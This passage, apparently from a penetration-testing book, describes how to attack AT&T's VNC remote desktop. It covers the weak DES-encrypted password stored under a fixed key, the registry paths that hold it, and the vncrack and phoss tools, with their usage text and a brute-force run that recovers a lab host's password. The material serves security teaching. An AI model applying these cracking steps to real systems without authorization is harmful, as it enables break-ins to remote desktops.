AT&T's Virtual Network Computing (VNC) package is available from http://www.uk.research.att.com/vnc/. VNC is a free and simple remote desktop access system for Windows, and it runs over the following TCP ports:
Port 5800 for HTTP access to VNC using a Java client through a web browser
Port 5900 for direct access to VNC using the native vncviewer.exe
From a security perspective, VNC is relatively straightforward to compromise. A major issue with VNC security is its authentication mechanism, shown in Figure 7-3.
VNC requires only one piece of data for authentication purposes: a session password with a maximum length of eight characters. On the target server, the VNC password string is stored in the Windows registry under the following keys:
A fixed key encrypts the VNC password using DES, so if an attacker gains read access to the system registry across the network (often accessible on poorly protected Windows hosts) she can compromise the VNC session password. The fixed key is found in the VNC source code (0x238210763578887 at the time of writing).
vncrack by FX of Phenoelit is a Unix-based VNC cracking utility that's available from http://www.phenoelit.de/vncrack/. You can use vncrack to perform decryption of the VNC session password retrieved from the system registry, as well as active brute force against the VNC service over a network.
The VNC handshake can be sniffed, and the session password compromised using the Unix-based phoss network sniffing utility, available from Phenoelit at http://www.phenoelit.de/phoss/.
Example 7-17 shows the usage of the Unix-based vncrack utility.
# ./vncrack VNCrack $Id: ch07.xml,v 1.4 2004/04/02 23:01:01 chodacki Exp $ by Phenoelit (http://www.phenoelit.de/) Usage: Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's] Passwd: ./vncrack -C /home/some/user/.vnc/passwd Windows interactive mode: ./vncrack -W enter hex key one byte per line - find it in \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password Options for online mode: -v verbose -d N Sleep N nanoseconds between each try -D N Sleep N seconds between each try -a Just a funny thing -p P connect to port P instead of 5900 -s N Sleep N seconds in case connect( ) failed Options for PHoss intercepted challenges: -c <challenge> challenge from PHoss output -r <response> response from PHoss output
By specifying the challenge and response traffic siphoned by phoss, the tool can instantly compromise sniffed session passwords also. Example 7-18 shows that the VNC session password for 192.168.189.120 is control after launching a brute-force attack.
# ./vncrack -h 192.168.189.120 -w common.txt VNCrack - by Phenoelit (http://www.phenoelit.de/) $Revision: 1.4 $ Server told me: connection close Server told me: connection close >>>>>>>>>>>>>>> Password: control >>>>>>>>>>>>>>>
The vncrack tool has been ported and compiled for Win32 environments, titled x4. Example 7-19 shows the x4 command-line options.
D:\phenoelit> x4 VNCrackX4 by Phenoelit (http://www.phenoelit.de/) Usage: Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's] Windows interactive mode: ./vncrack -W enter hex key one byte per line - find it in \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password Options for online mode: -v verbose (repeat -v for more) -p P connect to port P instead of 5900 Options for PHoss intercepted challages: -c <challange> challange from PHoss output -r <response> response from PHoss output
If the Phenoelit site is down or no longer archives these tools, these tools are available at the following locations: